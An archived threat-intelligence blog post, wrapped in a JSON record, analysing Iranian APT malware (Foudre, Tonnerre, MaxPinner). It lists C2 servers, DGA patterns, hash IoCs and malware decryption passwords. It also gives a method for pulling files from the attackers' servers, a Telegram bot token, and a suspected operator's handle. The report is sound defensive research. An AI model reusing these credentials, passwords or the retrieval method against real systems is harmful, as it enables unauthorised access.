{
	"id": "b0397a17-3350-4f2d-a442-bd8b8cef9bb6",
	"created_at": "2026-04-06T00:10:47.246939Z",
	"updated_at": "2026-04-10T03:36:22.918394Z",
	"deleted_at": null,
	"sha1_hash": "9e35d4e7e7c92176ebc097c36b77e326ebece9eb",
	"title": "Unmasking the Evolving Iranian Prince of Persia | SafeBreach",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5227070,
	"plain_text": "Unmasking the Evolving Iranian Prince of Persia | SafeBreach\r\nBy Author:  Tomer Bar, VP Security Research, SafeBreach\r\nArchived: 2026-04-05 18:54:00 UTC\r\nIranian state-sponsored threat actors have been targeting networks and critical infrastructure organizations across\r\nthe globe—as well as dissidents of the Iranian regime—since the early 2000s. In 2016, Palo Alto Networks’ Unit\r\n42 identified one such threat actor known as “Infy” or “Prince of Persia,” with evidence of their activity targeting\r\nvictims in Iran and Europe dating back to 2007. In 2017, activity by the group was observed again through the use\r\nof a new malware variant, dubbed Foudre.\r\nSafeBreach Labs has followed the Prince of Persia group since 2019, and our own original research in 2021\r\npresented evidence that they had dramatically reinforced their operations security activities, technical proficiency,\r\nand tooling capabilities. However, for the next three years, there was no publicly identified activity from the\r\ngroup. Our research team continued to hunt for evidence based on a variety of anchors and patterns we had\r\ndefined. As a result, we were able to maintain unprecedented visibility into their malicious activity during this\r\ntime. \r\nIn the blog below, we first outline the key findings and takeaways of our most recent research targeting the Prince\r\nof Persia threat actor, revealing critical new details that will help other security researchers and cybersecurity\r\nprofessionals better understand—and defend against—this evolving threat. Next, we will provide a high-level\r\noverview of previous research on this threat actor that reveals important context about their motivations and\r\nactivities over the last decade. Then, we will dive into an in-depth analysis of several new malware variants\r\ndiscovered during our latest research campaign, including Foudre v34, Tonnerre v17, Tonnerre v50, an unknown\r\nFoudre version, and more. 
Finally, we provide an appendix that outlines relevant indicators of compromise\r\n(IoCs). \r\nKey Findings \r\nOur latest research targeting the Prince of Persia threat actor group uncovered the following new details and key\r\ntakeaways regarding the group’s activity over the last three years: \r\nThe scale of Prince of Persia’s activity is more significant than we originally anticipated. Our research\r\nidentified multiple campaigns that used a large number of malware variants and C2 servers.\r\nThere are at least three active variants of Foudre and Tonnerre using different DGAs in parallel and\r\ncommunicating with an active C2 server:\r\nTonnerre v50, which was detected as recently as September 2025 and uses an unknown DGA\r\nalgorithm.\r\nTonnerre v12-16, which uses the original CRC32-based DGA.\r\nTonnerre v17, which uses the original CRC32 as the first stage and then adds a second-stage DGA\r\nalgorithm.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 1 of 32\n\nFor the first time since 2016, we discovered that the new Tonnerre v50 malware is redirected by the C2\r\nserver to a Telegram group, which includes a Telegram bot that likely uses the Telegram API to send\r\ncommands and receive the exfiltrated victim data. Telegram may be used as a replacement for the FTP\r\nprotocol used by former versions of Tonnerre.\r\nThe Telegram group name in Persian is ”سرافراز“, pronounced “sarafraz” in English, which translates to\r\n“proudly.” Beside the bot is a Persian user name: @ehsan8999100. This user is probably one of the Iranian\r\nhackers behind Prince of Persia. Below is a screenshot taken on December 14, 2025, showing the user had\r\nbeen active the day before.\r\nOur research identified additional unknown variants that are similar to Tonnerre and were probably used to\r\ndownload and execute Foudre:\r\nTwo versions of the Amaq News Finder and Deep Freeze variants. 
\r\nNew variants of the MaxPinner malware family, which focuses on spying on Telegram’s content. \r\nAnother unknown malware family named Rugissement, which includes variants that were probably\r\nunknown attack vectors used in 2019-2021. \r\nWe found Foudre v34, which was publicly available, and Tonnerre v17, which we captured ourselves. \r\nThe threat actor is using multiple C2 servers. Despite their prevention efforts, we were able to consistently\r\ndownload the victim files exfiltrated by Foudre and Tonnerre from all C2 servers, including the older C2\r\nservers from 2021 and the newer version from September 2025.\r\nMost of the C2 servers we found in the last two years appear to be used for testing purposes by the threat\r\nactor, with a limited number of real victims. We believe sharing the characteristics of the discovered testing\r\nC2 servers will help other security researchers discover additional “production” C2 servers. \r\nBackground\r\nIn 2016, Palo Alto Networks’ Unit 42 initially discovered Prince of Persia, an APT group that appeared to have\r\nties to the Iranian government. Researchers at Qi-Anxin’s Threat Intelligence Center investigated a specific attack\r\ntargeting Danish diplomats—named Operation Mermaid—that appeared to use the same methods and\r\ninfrastructure associated with the group.\r\nAfter the publication, Unit 42 conducted a takedown operation. This gave the researchers more visibility into the\r\norigin of victims, the motive of the attackers, and the scope of the attack. The data gathered reaffirmed the Iranian\r\nconnection—most victims were either in Iran or were Iranian dissidents, and the attackers did not seem to be\r\nfinancially motivated. 
As a result of the takedown, Prince of Persia lost access to almost all of the campaign\r\nvictims.\r\nResearch by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution. The threat group\r\ncompromised two news websites related to Jundallah as early as 2010, and exploited ActiveX vulnerabilities to\r\nattack the websites’ visitors. Prince of Persia seemed to have operated heavily around the 2013 Iranian\r\nPresidential elections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society\r\nmembers and activists afterwards.\r\nGuarnieri \u0026 Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication\r\nCompany of Iran blocked and redirected any traffic originating from Iran aimed at Palo Alto’s sinkholes. This was\r\nprobably a deliberate attempt by the threat actors to reduce visibility and regain control of the victims. This was\r\nnot an ability demonstrated by most threat actors, which further supports the connection to the Iranian\r\ngovernment.\r\nIn August 2017, Prince of Persia activity was observed again, this time through the use of a new malware dubbed\r\nFoudre, which means “lightning” in French. In 2018, Foudre version 8 introduced a new malware variant dubbed\r\nTonnerre, which means “thunder” in French. The two variants worked together, with Foudre serving as the first-stage malware that was used to map a victim’s identity. If the victim was deemed important enough, Foudre then\r\ndownloaded and executed Tonnerre. \r\nAs of 2022, the last known public version of Foudre was v24. 
The last known public version of Tonnerre was v11;\r\nhowever, we were able to download v14 and v15 from one of the C2 servers in 2022.\r\nAfter that, Prince of Persia appeared to go dark, with no publicly identified activity over the next three years.\r\nBased on our in-depth understanding of this threat actor, we assumed they were still carrying out attacks under the\r\nradar, so we continued to actively hunt for evidence. In order to achieve this kind of monitoring over the course of\r\nseveral years, we established anchors and defined patterns that would help us find a new lead, even if the threat\r\nactor changed tactics, like using a new trojan version or C2 server structure. This tracking allowed us to maintain\r\nvisibility into their malicious activity and develop the research updates presented in this post.\r\nThe graphic below provides an overview of the timeline of the malware development process since 2016,\r\nincluding capture dates. The focus of this blog will be to elaborate on the new findings, which are identified in\r\nbold.\r\nThe Research Process\r\nAs noted above, SafeBreach Labs has followed the Prince of Persia group since 2019. After the group appeared to\r\ngo dark in 2022, our research team continued to hunt for evidence based on a variety of anchors and patterns we\r\nhad defined. As a result, we were able to maintain unprecedented visibility into their malicious activity. Below, we\r\nprovide an analysis of these findings. \r\nAnalysis of the Malware Files\r\nFoudre v34 \r\nWith the new version of Foudre we discovered, the attack vector had changed from a macro file to a Microsoft\r\nExcel file with an embedded executable. 
The Excel file is fully undetectable by all antivirus engines in VirusTotal.\r\nBelow is an image of the embedded executable header:\r\nThe Excel file drops Foudre v34 as an SFX file:\r\nConf8830.dll is the loader. It will call the exported function f8qb1355 of d232, which is a Foudre v34 DLL, and a\r\ncamouflage MP4 file in order to complete the user deception (the icon is that of Windows Media Player). An\r\nadditional SFX attack file was uploaded from the US in March 2025:\r\nThe threat actor also continues to use Excel files that include a macro as an attack vector\r\n(52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9). The Excel file was included in a\r\nzip file named شاخص شهدای.zip (Notable Martyrs.zip)—alongside three other benign Excel files—and was\r\nuploaded to VirusTotal.com in January 2024 from Germany.\r\nThe Excel file includes macro code to drop and execute ccupdate.tmp.\r\nThe threat actor left previous names of embedded Foudre files as comments:\r\nccupdate.tmp is the current dropped file\r\nEZUpdate.tmp is known to be a Foudre v21 infection from 2020 \r\neuupdate.tmp and cqupdate.tmp infections are not publicly available\r\nOnce the victim opens the Excel file and allows ccupdate.tmp to be opened, Foudre is installed.\r\nOne of the samples includes an embedded deceptive message that was taken after May 2023 from this article.\r\nThe main difference from previous versions is that a new DGA algorithm and the DGA prefix LOS1 are used. 
In\r\naddition, the algorithm is divided into two steps:\r\nThe first calculates the original DGA by computing a CRC32 of the string LOS1{}{}{}.format(date.year,\r\ndate.month, weeknumber).\r\nThe second DGA phase generates an eight-character domain host name (only alphabet letters) by adding\r\nthe value 0x8 and the character index to each alphabet character and 0x39 to each digit. This is done in order to\r\ntransform the hexadecimal characters a-f and 0-9 into letters only. \r\nThis DGA generates domain names that consist of only characters from the range j-z. This script implements the\r\nDGA:\r\nAn Internet check is also done to another legitimate site (see the appendix for additional details).\r\nTonnerre v17\r\nTonnerre v17 is the latest version binary that we were able to capture at the time of publishing. This version uses\r\nthe same DGA algorithm as Foudre v34 but with a different key prefix: FTS1. It includes an embedded news\r\narticle that was published on January 20, 2023.\r\nThe file was built by the adversary a day after the article was published. We obtained access to it via direct\r\ndownload from the C2 server by impersonating a Foudre-infected host. After decrypting the SFX file, we obtained\r\nthe final Tonnerre v17 binary. \r\nSince January 2023, we have attempted to capture newer versions of Tonnerre. It took almost three years to find a\r\nnew C2 server that could communicate with this newer Tonnerre version. We will explore this in more depth later,\r\nbut first let’s understand the C2 structure of Foudre v34 and Tonnerre v17. 
\r\nC2 Server Structures\r\nFoudre v34\r\nThe C2 server structure of Foudre v34 included four directories: 1, 2, de, en. Below is an illustration of the C2\r\nstructure. NOTE: The real C2 server runs on Linux and does not enable directory browsing.\r\nFoudre sends the victim machine’s globally unique identifier (GUID) to the C2 server via an HTTP GET request:\r\nhttps://\u003cc2 server\u003e/1/?c=\u003cmachine name\u003e\u0026u=\u003cuser name\u003e\u0026v=\u003ccurrent version\u003e\u0026s=\u003csubject\u003e\u0026f=\u003cc2 folder\u003e\u0026mi=\u003cmachine GUID\u003e\u0026b=\u003carch\u003e\u0026t=\u003ctime\u003e\r\nThis is done to check if the Foudre version should be upgraded. The /1/index.php reads a text file on the C2\r\nserver: \r\nIf the GUID is included in this file, it will redirect the HTTP GET request to download the encrypted SFX\r\nupgrade file.\r\nIf the GUID isn’t included, it will redirect to a non-existing file or just return a “page not found” error. \r\nDirectories 2 and de are used for a signature download as part of Foudre C2 validation—this process was\r\ndescribed in our previous research report.\r\nThe en directory is used to receive and store the files exfiltrated to the C2 server.\r\nUnder the en directory, there are four sub-directories—blkb, dirm, dirt, and cplist—and an index.php file.\r\nThe download of the victim’s files is done via fdir.php under the dirt and dirm directories. 
It allows the threat actor\r\nto move the exfiltrated data from the C2 server, which is usually in Europe, to Iran.\r\nThe index.php stores the exfiltrated data in the dirt, dirm, and blkb folders. It stores the victims’ data separately\r\nfrom the files exfiltrated from the attacker’s testing machines. The victims’ files are stored in folders dirm and dirt, while\r\nthe attacker’s files are stored under the blkb folder. The check is done by reading the machine GUIDs of the\r\nattacker’s machines from the file blk.lst.\r\nIf the machine GUID is one of the three attacker’s machines above, it will store the files under the blkb folder.\r\nOtherwise, it will store the exfiltrated files under the dirm/dirt folders.\r\nThe goal of the separation is to prevent the fdir.php backend script from downloading the attacker’s exfiltrated files and\r\nonly allow download of dirm/dirt files. We will now explain how we were able to work around this limitation and\r\ndownload the attacker’s files as well.\r\nThe cplist directory includes a communication log file for each victim—the file name is the victim’s machine host\r\nname. The log file includes the following data:\r\nIP\r\nC2 domain name\r\nmachine GUID\r\ntime \r\nNow that we have the exact time of the communication, the machine GUID, the IP, and the structure of the\r\nexfiltrated file name from the dirm/dirt downloaded files, we can download any file from this attacker’s machine.\r\nWe first tried 256 requests using the formula:\r\n/blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003chh\u003e\u003cmm\u003e\u003css\u003e.\u003cip\u003e.\u003c0-255\u003e\r\nIt didn’t work. However, when we added different hours and minutes it worked. 
As an example, we were able to\r\ndownload this file on November 24, 2025, from: /blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003chh\u003e\u003cmm\u003e\u003css\u003e.\u003cip\u003e.\u003c0-255\u003e\r\nWe then noticed that the difference between the time of the communication log and the time in the actual file\r\nname was not random. We assumed it was a fixed time gap and, once we used the same time gap, we were able to\r\ndownload a previous file from October 9, 2025. \r\nSo, by sending up to 256 requests, we were able to download any of the attacker’s exfiltrated files from this\r\nattacker’s machine. This is the final formula:\r\n/blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003cfixed hh gap\u003e\u003cfixed mm gap\u003e\u003css\u003e.\u003cip\u003e.\u003c0-255\u003e\r\nTonnerre v17\r\nThe C2 server structure of Tonnerre v17 is similar to Foudre v34 and includes three directories: blog, f, and s.\r\nBelow is an illustration of the C2 structure.\r\nThe f directory stores the communication log file (like en/cplist in Foudre v34). The s directory is for the\r\nvalidation of the C2 (like 2 and de in Foudre v34). The blog directory is used to store the exfiltrated files (like en\r\nin Foudre v34).\r\nWe were able to download the victims’ files from 2021. The data is encrypted, but it includes metadata on the file’s\r\nfull path, host name, user name, Tonnerre version, and machine GUID.\r\nOnce we had the victim’s machine name, we could download the communication log of this victim from the\r\nen/cplist and f directories.\r\nMost of the victims were located in Iran, but there were some across Europe and in countries like Iraq, Turkey, India,\r\nand Canada. 
While we have chosen not to publish the data here due to privacy concerns, we are more than willing\r\nto share the data with authorized law enforcement agencies. \r\nCovering Their Tracks\r\nMonitoring the Prince of Persia campaigns was challenging, as the threat actor moved between C2 servers\r\nfrequently, used techniques to cover their tracks, and removed infections they considered of no value. In August 2022, we\r\ndiscovered in real time that the threat actor was uploading commands to delete Foudre from some victims’\r\nmachines and transferring other victims to communicate with a new C2 server. \r\nThe command was implemented like a new version upgrade. Foudre upgrades itself by downloading an encrypted\r\nSFX file. The deletion was completed in the same way, as an encrypted SFX file that, instead of installing a new\r\nversion, terminates the Foudre process and then renames the Foudre file, so it won’t load again after an OS\r\nrestart. The SFX file is encrypted with the password RBA4b5a98Q, which is the same password used in the version\r\nupgrade process.\r\nThe following list outlines the C2 servers of Foudre v34 and Tonnerre v17—as well as the dates of their activity—\r\nuncovered by our research:\r\n45.80.148.35 – active since September 2025\r\n45.80.151.166 – active between December 2024 and September 2025 (old and new DGA) \r\n45.80.151.24 – active between April 2024 and December 2024 (old and new DGA)\r\n45.80.151.179 – active between October 2023 and April 2024 (old and new DGA)\r\n45.80.148.128 – active between June 2023 and January 2024 (old DGA)\r\n179.43.190.13 – active between July 2022 and May 2024 (new DGA)\r\n45.80.151.71 – testing server rather than fully operational C2 server – used for olptqwrq.space and\r\nkmnnuqru.space between October 2023 and December 2024\r\nNew C2 Server Structures\r\nThe biggest development from our latest 
research is that we were able to detect the following C2 servers with a\r\nnew structure that the threat actor used to control victims of a new Tonnerre v50 and an unknown, new Foudre\r\nversion:\r\n45.80.148.195 – active since October 12, 2025 – only for the new Foudre version (12-length DGA-generated domain names)\r\n45.80.148.124 – active between August 1, 2025 and September 20, 2025 for both the new Foudre version\r\nand new Tonnerre v50 (10- and 13-length DGA-generated domain names)\r\nTonnerre v50 \u0026 New Foudre Version C2 Server Structure\r\nThe C2 server structure includes four directories: r, search, t, web. Below is a local illustration of the C2 server.\r\nNOTE: The real C2 server is usually a LiteSpeed web server.\r\nThe r directory is used for storing the communication logs (similar to the “f” directory in previous C2 servers). The\r\nsearch directory is used for C2 validation (similar to the “s” directory in previous C2 servers). The web directory is\r\nused for storing the exfiltrated files (similar to the “blog” directory in previous C2 servers). The t directory stands for\r\nTelegram and is used for downloading the file tga.adr to communicate with the Telegram API\r\n(https://crsvbuxfoovzy.privatedns.org/t/tga.adr).\r\nHowever, the download of the tga.adr file can only be achieved for a closed list of enabled victim GUIDs. 
We\r\nwere able to get the GUID and trigger the download of the tga.adr file.\r\nThe content of tga.adr is:\r\nTGsend: Actived\r\n874675833\r\n7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM\r\nAfter the status line, the first line includes Telegram’s bot chat_id and the second line includes Telegram’s token.\r\nWe used the token to query the chat member count and found two members: \r\nThe first member is the bot, named “ttestro1bot,” which probably stands for Tonnerre Test Robot.\r\nThe bot doesn’t have permissions to read chat messages:\r\nThe second member is even more interesting: Ehsan (written in Persian), who is probably one of the threat group\r\nhackers responsible for commanding the victims’ machines over Telegram:\r\nEhsan is a private user type with the following permissions:\r\nThis user was still active as recently as December 13, 2025:\r\nEhsan is a common Persian name typical for an Iranian. This attribution is pretty strong in combination with the IP\r\nlocation of the attacker’s testing machine. We tracked the IP addresses used over several years, all of which\r\nindicated Iran as the location. 
While different IP location databases provided different cities, all of them were in\r\nIran: \r\n83.122.48.123 – IRAN – Tehran / Zahedan / Mashhad\r\n37.156.153.108 – IRAN – Tehran / Bandar-e Emam Khomeyni \r\n5.125.60.37 – IRAN – Tehran / Sabzevar / Mashhad\r\n37.156.155.168 – IRAN – Tehran / Karaj / Mashhad\r\n113.203.19.147 – IRAN – Tehran / Mashhad\r\nNew Foudre Version C2 Server Structure \r\nThe C2 server structure for the new (unknown) Foudre version includes the following directories: dirm, dirt, download,\r\nkey, and list. Below is a local illustration of the C2 server structure.\r\nThe list/slist directory is used for storing the communication logs (similar to the “en/cplist” directory in previous C2\r\nservers).\r\nThe key directory is used for C2 validation. Every day, Foudre downloads a dedicated signature file encrypted\r\nwith the threat actor’s RSA private key and then uses RSA verification with an embedded public key to verify\r\nthat this domain is an approved domain. The request’s format is:\r\n“https://\u003cdomain name\u003e/key/\u003cdomain name\u003e\u003cyy\u003e\u003cday of year\u003e.sig”\r\nThe purpose of the download directory is unknown. We believe it is probably used to download and upgrade to a\r\nnew version. The dirm and dirt directories are in the root folder and are used to store the exfiltrated files. \r\nTonnerre v50 \u0026 New Foudre Generated Domain Names\r\nThe TLD extensions are “site,” “hbmc.net,” and “ix.tc” for Foudre; for Tonnerre the TLD is “privatedns.org.” The\r\nFoudre DGA is unknown; it generates varied alphabetic domain names of 10 or 12 characters with different\r\nTLDs: “site”, “ix.tc”, and “hbmc.net”. 
The Tonnerre DGA generates 13-character domain names with \r\n“privatedns.org” as the TLD. \r\nBelow are some examples of the C2 servers’ domain names: \r\nFoudre\r\ndmxqdlcuiryu.site\r\nxleeuzjdpqwm.ix.tc\r\nxleeuzjdpqwm.hbmc.net\r\nTonnerre\r\ncrsvbuxfoovzy.privatedns.org\r\nOlder Variants Discovered for the First Time\r\nIn addition to the new C2 server and Telegram group, we also discovered important findings on the early stages of\r\nFoudre campaigns dating back to 2017 and 2020.\r\nAmaq News Finder – July-October 2017\r\nWe discovered a different variant of Foudre camouflaged as Amaq News Finder (AMF). This is probably one of\r\nthe first attack vectors used to download and execute Foudre. Amaq News Agency is a news outlet linked to the Islamic\r\nState (ISIS). In March 2019, Amaq News Agency was designated as a foreign terrorist organization by the United\r\nStates Department of State.\r\nIn the example below, pressing the Start button will execute the trojan’s malicious activity, which is similar to\r\nFoudre but different in the URLs used and in its use of an encryption key (amfkey01.key).\r\nThe TLDs are also different: .stream, .in, .mooo.com, .ddns.net, .dynu.net. The DGA prefix is AmaqFinder1, which is\r\nlonger than the regular three uppercase letters plus a digit used in all other versions of both Foudre and Tonnerre.\r\nThis leads us to believe it was used on high-value victims.\r\nAmaqFinder was also used to download and execute Foudre v3 in October 2017\r\n(160bb722bd70b70c3e993c8eba59d8cf8117899073a4a6e42b0240d858a98dad).\r\nThe DGA AmaqFinder1201710401 (\u003cAmaqFinder1\u003e\u003cyear=2017\u003e\u003cmonth=10\u003e\u003cweek=40\u003e1) generates the C2\r\nhostname: eab6ff48.stream. 
hxxp://eab6ff48.stream/update/af17818.tmp resolved to 185.148.144[.]3\r\nThe “af” at the beginning of the file name probably stands for the initials of AmaqFinder1, and the digits are the\r\ndate (August 18, 2017); the file is decrypted using the password NPA46b3a98L. Version 1.7 of AmaqFinder uses the same\r\nthird-party sites: http://www.cnbc.com/id/100727362/device/rss/\r\nMax Pinner v8 \u0026 the Unknown Rugissement Variant\r\nWe also discovered a newer version of MaxPinner (v8), which is the Telegram data-focused trojan. The latest\r\nknown version was v5. Version 8 appears to have been developed in March 2021. Our analysis also revealed an\r\nadditional malware family, named Rugissement (meaning “roar” in English) by the threat actor. MaxPinner\r\nchecks if Tonnerre versions 12-18 or Rugissement 16-17 are already installed on the victim’s machine. If so, it\r\nwon’t infect it with MaxPinner.\r\nMaxPinner is downloaded by the loader DLL of Foudre v24, named conf6829.dll\r\n(FFCEC3018C6D56C83EE2F7F14D2A63B945ECEAB13EE9EBDA730B4975942B0935). It downloads and\r\nexecutes MaxPinner from http://2fe55007.xyz/pinner/tdupdatex.dat, which is an encrypted rar file with the password\r\naqoiR4.\r\nDeep Freeze Version\r\nWe also discovered a different variant of Deep Freeze from 2019-2020 that is similar to AmaqFinder, with the\r\nsame structure. This variant was probably used to infect victims with Foudre. The upgrade of the malware to a\r\nnewer version in all Prince of Persia malware families includes an embedded password that is used to decrypt the\r\ndownloaded binary and execute it. 
\r\nAll known versions of Foudre use: RBA4b5a98Q\r\nAmaq Finder versions use: NPA46b3a98L\r\nTonnerre versions use: TtckjcAa54cE\r\nMaxPinner versions use: TtWkjcGa54cE\r\nThere are only two different characters between the last two passwords and six similarities between the first two\r\npasswords. \r\nThe Deep Freeze version uses the password DFV54zZ8c. It probably stands for Deep Freeze version 54. The DGA prefix\r\nalso seems to be deliberately chosen for this version (Deep Freeze): DFH1. The TLD extensions are .pw and\r\ndynu.net, which were used by Foudre as well. \r\nThe Deep Freeze binary malware was uploaded from Brazil and Turkey.\r\nBelow is an example of the date and file size of the Deep Freeze variant we discovered. \r\nC2 Servers and DGA Algorithm Analysis\r\n45.80.148.35 – active since September 2025\r\n45.80.151.166 – active between December 2024 and September 2025 (old and new DGA)\r\n45.80.151.24 – active between April 2024 and December 2024 (old and new DGA)\r\n45.80.151.179 – active between October 2023 and April 2024 (old and new DGA)\r\n45.80.148.128 – active between June 2023 and January 2024 (old DGA)\r\n179.43.190.13 – active between July 2022 and May 2024 (new DGA)\r\n45.80.151.71 – testing server rather than fully operational C2 server – used for olptqwrq.space and\r\nkmnnuqru.space between October 2023 and December 2024.\r\nTonnerre v50 and Unknown Foudre Version C2 Server\r\nC2 Server: 45.80.148.195\r\nActive Dates: Since October 12, 2025, for Foudre\r\nDomain Names: \r\nhkdhhwsafvnef.hbmc.net\r\nzjnomxhcrkfc.site\r\nwhpgwzunsijn.site\r\ngwmkgkfyovzy.site\r\nvitevjtlawkl.site\r\ndmxqdlcuiryu.site\r\nrbhfrmezhmlz.site\r\nplfwpybxjysx.site\r\noszzoalgfarg.site\r\nC2 Server: 45.80.148.124 \r\nActive Dates: 
Between August 1, 2025, and September 2025 for both the new Foudre and Tonnerre versions\r\nDomain Names:\r\nhhwcpxxbnk.site\r\nddqwhrrkfc.site\r\ncrsvbuxfoovzy.privatedns.org\r\nsdagmihqcbgup.privatedns.org\r\nvtgpzfdmwkpah.privatedns.org\r\nxjhdvkoszwdpt.privatedns.org\r\nxleeuzjdpqwm.ix.tc\r\nazffhynitsmv.ix.tc\r\nxleeuzjdpqwm.hbmc.net\r\nC2 Server: 45.80.149.100\r\nActive Dates: Probably an earlier C2 server from February – April 2025 \r\nDomain Names: \r\ntegfxbnk.site\r\niiunewhmlz.site\r\nzbddztherkfc.ix.tc\r\nffhbnqtsmv.site\r\nauuxshqodj.ix.tc\r\nejjnhkucbw.ix.tc\r\nNotes: The domain names end in the same way as the domain names from recent servers.\r\nThe new unknown DGA algorithm does not create a totally random domain name. We found that the last four\r\nletters generated by the Foudre DGA were the same on different C2 servers and at different times, with\r\ndifferent TLDs and with different domain name lengths. This occurs for both Foudre 10-length and 12-length\r\ndomain names and even for a single Tonnerre 13-length domain name. \r\nDomain names grouped by shared four-letter ending, per C2 server (capture date after each name):\r\nC2 Server 45.80.149.100 | C2 Server 45.80.148.124 | C2 Server 45.80.148.195\r\nffhbnqtsmv 18/3/25 | azffhynitsmv 31/7/25 | -\r\ntegfxbnk 15/2/25 | hhwcpxxbnk 10/9/25 | -\r\nzbddztherkfc 1/4/25 | ddqwhrrkfc 3/9/25 | zjnomxhcrkfc 10/12/25\r\niiunewhmlz 29/3/25 | - | rbhfrmezhmlz 22/10/25\r\n- | crsvbuxfoovzy 5/9/25 (Tonnerre) | gwmkgkfyovzy 25/11/25 (Foudre)\r\nThis might indicate that the new DGA for 10/12/13-length domain names does not replace the CRC32 algorithm\r\n(which generates exactly 8-length domain names) with a new algorithm that generates more than 13 characters\r\nfrom which the first 10/12/13 characters are selected. 
It can be a mixture of: \u003c8 characters CRC32\u003e\u003cdifferent algorithm to\r\ngenerate the last 4 characters\u003e \r\nLooking closer, we found some repeating patterns in the domain names that contradict the CRC32 assumption,\r\nsince CRC32 is expected to generate random-looking results:\r\nFoudre 12-length .site tld: The first letter always equals the fifth letter and the eighth equals the last:\r\ngwmk gkf yovzy\r\nvite vjt lawkl\r\nrbhf rme zhmlz\r\nplfw pyb xjysx\r\noszz oal gfarg\r\ndmxq dlc uiryu\r\nzjnomxhcrkfc.site – The latest domain name from December 10, 2025, is the only one that doesn’t\r\nuse the above pattern. The first letter does not equal the fifth letter. \r\nFoudre 12-length .ix.tc tld: The third letter always equals the fourth letter:\r\nazffhynitsmv\r\nxleeuzjdpqwm\r\nzbddztherkfc\r\nFoudre 10-length .site tld: The first letter always equals the second letter:\r\nhh wcpx xbnk\r\ndd qwhr rkfc\r\nff hbnq tsmv\r\nTonnerre 13-length .privatedns.org: The fourth letter always equals the eleventh letter:\r\nsdag mihqcb gup\r\nvtgp zfdmwk pah\r\nxjhd vkoszw dpt\r\ncrsv buxfoo  vzy\r\nWe are sharing the above information to help other researchers predict the new DGA algorithm. Our assumption is\r\nthat the algorithm is now more complex; it may skip different indexes. For example, if we skip the first, fifth,\r\neighth and twelfth characters, gwmkgkfyovzy becomes wmkkfovz. It’s an 8-length domain name that can be\r\ngenerated by CRC32, with the ‘g’ and ‘y’ added in the above locations. This algorithm does not explain the\r\nrepeating of the last four characters on different dates. \r\nAnother observation is that after a double letter in the domain name, there are usually exactly 8 characters until the\r\ndomain name’s end (e.g., hhwcpxxbnk, xleeuzjdpqwm). 
This may indicate that the 8 characters are generated like the\r\nold CRC32, and there is a new part that generates the first part of the domain name.\r\nConclusion\r\nDespite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite.\r\nOur ongoing research campaign into this prolific and elusive group has highlighted critical details about their\r\nactivities, C2 servers, and identified malware variants in the last three years. This threat group is still active,\r\nrelevant, and dangerous. By sharing our research publicly, we hope to help other cybersecurity professionals better\r\nunderstand the associated risks and IOCs of this group, as well as support additional research within the larger\r\ncybersecurity community. \r\nFor more in-depth information about this research, please: \r\nContact your customer success representative if you are a current SafeBreach customer\r\nSchedule a one-on-one discussion with a SafeBreach expert\r\nContact Kesselring PR for media inquiries \r\nAbout the Researcher\r\nTomer Bar brings over 20 years of cybersecurity research experience to this position, including work in the areas\r\nof advanced persistent threat (APT) groups, vulnerabilities, reverse engineering, and forensics. As a hands-on\r\nsecurity researcher and head of the SafeBreach Labs team, Bar has discovered multiple vulnerabilities in the\r\nWindows operating system. His contributions have earned him recognition as one of Microsoft’s 2023 Most\r\nValuable Security Researchers and a nomination for Best Privilege Escalation Vulnerability at the 2021 Pwnie\r\nAwards. Tomer holds a Master’s degree from Bar Ilan University. He is a frequent public speaker, presenting his\r\nresearch at events worldwide, including DEF CON (28-31), Black Hat USA, Black Hat Asia, etc. 
He is also\r\na member of the BlackHat Europe review board, where he leads the malware track talks.\r\nAppendix: IOCs – Malware Hashes\r\nTonnerre v14 exe\r\nCB6ED0DD5DBC2E34AE36DD22B9522F7EEC94BBFDA2DCDA7425736656279F8CDF\r\nTonnerre v15 exe\r\n30C20ADA243B7E476E006DEC94876BDEECE4F8ACA12A4CB6CF962C80F1A6EE3C\r\nTonnerre v17 exe\r\nD9DFC8A8E3E259A517A91E2E91E3A1D6EF1D5B0886E6729BF897D6EF1B2DE722\r\nFoudre SFX v34  \r\n43ccc2620229d88d5a6ca2b064da0554ec3c3cc29a097e7a2d97283257cfae69\r\n0bfc11c6ba57fdaa8b865555d80d8f7d7b1d0f41a23a277885198b3113c945d9\r\nCf64bf78ce570f8085110defc8ec32ff4f01c7359723510b9d1923fd93d12240\r\nFBB2AC0D07B84068AA35376CC994039F9FC1D2341643BC2BF268D65AB11ECBE3\r\n2c46406fb9111e0e4d982de54f335ae2900cdc39490d58f765cd5014153b3e12\r\nFoudre v34 dll – imphash \r\n57447c4c35a807b252b9ba3c17de230f\r\nd912\r\n52abb57bf6f9db815b3ddf6241e21d4096f36eb998bb51e728bbe68c0f8e8e15\r\nd232\r\nfa95a09e538b8c186a3239e3ff80ec9054b50aab80c624e75563ace4e60e31da\r\nd463\r\nF54cfe296186644d0fed271c469af1ef9b6156affe9e030e7b83b8de097eb1e7\r\nD665\r\n6f976a685ae838a7062fb4f152c6c77c42168b78b9aadd4278ec1c19f9bc1055\r\nD955\r\n12847DC6DFD86603E8F0085AE561B4B2E3089E5414E49628F7C411483C7B5CE8\r\nFoudre v34 Loaders \r\nconf8830.dll\r\nd3d8b79f86f152338aabeadfaf35ba2e43f82aa4bfa29ff70b59702b455fa6a6\r\nFoudre Office Infection \r\n15dd41ec1bdaabb741e8cc6481e0a98831798ac4e93c2513cdbd00c51241ffb7\r\n52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9\r\nTonnerre v17 SFX\r\nC8583FDDF668808E31F993FF6BCFC6F8BA8B4C2C0C4EA51D4CCC6F5D311B6C90\r\nTelegram 